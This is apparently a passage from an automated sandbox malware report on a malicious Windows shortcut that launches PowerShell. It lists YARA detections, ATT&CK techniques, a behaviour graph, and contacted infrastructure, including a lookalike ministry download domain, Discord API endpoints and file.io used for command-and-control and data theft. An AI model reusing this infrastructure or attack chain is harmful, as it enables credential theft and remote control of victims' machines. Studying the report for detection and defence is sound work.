                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                12
                Process Injection
                11
                Masquerading
                OS Credential Dumping21
                Security Software Discovery
                Remote Services11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                1
                DLL Side-Loading
                1
                Registry Run Keys / Startup Folder
                41
                Virtualization/Sandbox Evasion
                LSASS Memory12
                Process Discovery
                Remote Desktop ProtocolData from Removable Media3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                12
                Process Injection
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing
                Cached Domain Credentials2
                System Network Configuration Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem21
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522859 Sample: jKSjtQ8W7O.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 26 ministryofficedownloadcloudserver.screenpont.xyz 2->26 28 www.ministryof.gov.pk 2->28 30 gateway.discord.gg 2->30 54 Malicious sample detected (through community Yara rule) 2->54 56 Windows shortcut file (LNK) starts blacklisted processes 2->56 58 Multi AV Scanner detection for submitted file 2->58 62 9 other signatures 2->62 8 powershell.exe 14 32 2->8         started        12 svchost.exe 1 2 2->12         started        signatures3 60 Performs DNS queries to domains with low reputation 26->60 process4 dnsIp5 36 ministryofficedownloadcloudserver.screenpont.xyz 188.114.97.3, 443, 49708, 49712 CLOUDFLARENETUS European Union 8->36 64 Windows shortcut file (LNK) starts blacklisted processes 8->64 66 Uses ping.exe to check the status of other devices and networks 8->66 68 Uses nslookup.exe to query domains 8->68 14 chrome.exe 9 8->14         started        17 nslookup.exe 1 8->17         started        19 nslookup.exe 1 8->19         started        21 3 other processes 8->21 38 127.0.0.1 unknown unknown 12->38 signatures6 process7 dnsIp8 40 192.168.2.17 unknown unknown 14->40 52 3 other IPs or domains 14->52 23 chrome.exe 14->23         started        42 www.Elpson.com 17->42 44 1.1.1.1.in-addr.arpa 17->44 46 www.mproton.com 19->46 48 1.1.1.1.in-addr.arpa 19->48 50 gateway.discord.gg 162.159.135.234, 443, 49725 CLOUDFLARENETUS United States 21->50 process9 dnsIp10 32 pmo.gov.pk 203.101.184.118, 443, 49713, 49714 CYBERNET-APCyberInternetServicesPvtLtdPK Pakistan 23->32 34 www.google.com 142.250.186.132, 443, 49719, 49734 GOOGLEUS United States 23->34

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                jKSjtQ8W7O.lnk37%ReversingLabsShortcut.Trojan.WinLnk
                jKSjtQ8W7O.lnk100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://crl.microsoft0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ministryofficedownloadcloudserver.screenpont.xyz
                188.114.97.3
                truetrue
                  unknown
                  www.google.com
                  142.250.186.132
                  truefalse
                    unknown
                    gateway.discord.gg
                    162.159.135.234
                    truefalse
                      unknown
                      pmo.gov.pk
                      203.101.184.118
                      truetrue
                        unknown
                        www.Elpson.com
                        unknown
                        unknowntrue
                          unknown
                          www.mproton.com
                          unknown
                          unknowntrue
                            unknown
                            1.1.1.1.in-addr.arpa
                            unknown
                            unknowntrue
                              unknown
                              www.ministryof.gov.pk
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/false
                                  unknown
                                  https://pmo.gov.pk/site/404true
                                    unknown
                                    https://ministryofficedownloadcloudserver.screenpont.xyz//78/false
                                      unknown
                                      https://gateway.discord.gg/?v=9&encording=jsonfalse
                                        unknown
                                        http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/false
                                          unknown
                                          http://ministryofficedownloadcloudserver.screenpont.xyz//78/false
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://ministryofficedownloadcloudserver.screpowershell.exe, 00000000.00000002.3950139560.0000028D953F3000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              http://ministryofficedownloadcloudserver.scre$did/78/powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp, jKSjtQ8W7O.lnktrue
                                                unknown
                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3950139560.0000028D96C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.microsoftpowershell.exe, 00000000.00000002.4013626129.0000028DAD51F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://go.micropowershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://pmo.gov.pk/site/404ypowershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.microsoft.copowershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ministryofficedownloadcloudserver.screenpont.xyzpowershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.000001984294A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://pmo.gov.pk/site/404;powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, jKSjtQ8W7O.lnktrue
                                                            unknown
                                                            http://crl.ver)svchost.exe, 00000008.00000002.3952244849.000001B07849E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000008.00000003.1531647828.000001B078210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drfalse
                                                                unknown
                                                                http://gateway.discord.ggpowershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://geolocation-db.com/jsonPhttp://www.google.com/maps/place/powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://discord.com/api/v9/channels/powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://discord.com/api/v9/guilds/powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://g.live.com/odclientsettings/Prod/C:edb.log.8.drfalse
                                                                            unknown
                                                                            http://ministryofficedownloadcloudserver.screenpont.xyzpowershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://crl.microsoftfpowershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://file.io/powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://ministryofficedownloadcloudserver.screenpopowershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://ministryofficedownloadcloudserver.screepowershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://contoso.com/powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198440FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://gateway.discord.gg:443/?v=9&encording=jsonpowershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://oneget.orgXpowershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://pmo.gov.pk/site/404vpowershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://ministryofficedownloadcloudserver.screenpont.xyz//78/thepowershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://gateway.discord.ggpowershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://pmo.gov.pk/site/404;$did=powershell.exe, 00000000.00000002.3947739594.0000028D94C90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D93078000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D9312D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D930C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://oneget.orgpowershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                203.101.184.118
                                                                                                pmo.gov.pkPakistan
                                                                                                9541CYBERNET-APCyberInternetServicesPvtLtdPKtrue
                                                                                                162.159.135.234
                                                                                                gateway.discord.ggUnited States
                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                188.114.97.3
                                                                                                ministryofficedownloadcloudserver.screenpont.xyzEuropean Union
                                                                                                13335CLOUDFLARENETUStrue
                                                                                                239.255.255.250
                                                                                                unknownReserved
                                                                                                unknownunknownfalse
                                                                                                142.250.186.132
                                                                                                www.google.comUnited States
                                                                                                15169GOOGLEUSfalse
                                                                                                IP
                                                                                                192.168.2.8
                                                                                                192.168.2.17
                                                                                                192.168.2.4
                                                                                                127.0.0.1
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1522859
                                                                                                Start date and time:2024-09-30 18:57:14 +02:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 20s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:16
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:jKSjtQ8W7O.lnk
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3.lnk
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.evad.winLNK@26/23@17/9
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HCA Information:Failed
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .lnk
